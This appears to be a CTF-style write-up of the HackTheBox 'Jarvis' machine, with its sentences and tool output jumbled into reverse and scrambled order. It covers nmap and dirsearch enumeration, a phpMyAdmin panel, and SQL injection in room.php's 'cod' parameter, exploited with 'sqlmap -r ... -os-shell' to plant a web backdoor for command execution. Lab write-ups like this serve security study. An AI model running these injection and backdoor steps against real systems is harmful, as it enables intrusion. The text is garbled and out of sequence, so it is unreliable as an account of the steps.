What do you want to use for writable directory? unable to automatically retrieve the web server document root Which web application language does the web server support? the back-end DBMS operating system is Linux fingerprinting the back-end DBMS operating system going to use a web backdoor for command prompt Web application technology: Apache 2.4.25 Web server operating system: Linux Debian 9.0 (stretch)
Title: Generic UNION query (NULL) - 7 columns Title: MySQL >= 5.0.12 AND time-based blind Title: AND boolean-based blind - WHERE or HAVING clause Sqlmap resumed the following injection point(s) from stored session: parsing HTTP request from '/root/Desktop/HTB/jarvis/jarvis.req' Developers assume no liability and are not responsible for any misuse or damage caused by this program It is the end user's responsibility to obey all applicable local, state and federal laws. legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. I attempt to inject an always true condition below to test for a classic SQL injection, however my input is sanitized with URL-encoding and fails to return the requested sqlmap -r /root/Desktop/HTB/jarvis/jarvis.req -os-shell The ‘cod’ parameter in room.php appears to be a potential SQL injection point due to this behavior. Since I haven’t found a foothold at this point I return to reviewing the main site and I discover that room.php takes an input parameter named cod () that reads the hotel’s rooms from its database and then prints it out on the page, I was able to view six different rooms for booking by entering inputs 1 through 6.Įntering an unexpected input () doesn’t return an error, but does load a blank page. The message appears to suggest that a WAF is monitoring the site. I ran a web-path scanner from this page but no meaningful results were returned. Viewing the high-port page on loads the following text and nothing else: ‘Hey you have been banned for 90 seconds, don’t be bad’. The error message reveals that mySQL is part of the technology stack, but this information is already known if the attacker has familiarity with phpMyAdmin. I unsuccessfully try to authenticate with a few known default credentials. The second page of interest, loads a phpMyAdmin login panel. Viewing only loads the page seen before in plain http. Running a web-path scanner enumerates a few hidden files and directories, with /index.php/login/ and /phpmyadmin capturing most of my Desktop/dirsearch/dirsearch/dirsearch.py -u 10.10.10.143 -e *Įxtensions: 10.10.10.13.gnmap | HTTP method: get | Threads: 10 | Wordlist size: 6086Įrror Log: /root/Desktop/dirsearch/dirsearch/logs/errors-19-07-30_23-55-24.log
Most of the site’s functionality does not appear to work, namely sign-in, book-in, and utilities. The page appears to be for a hotel and the IP should likely resolve to ‘supersecurehotel.htb’. Web-servers are typically the first service I investigate, so I first view. No exact OS matches for host (If you know what OS is running on it, see ). |_http-title: Site doesn't have a title (text/html). 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)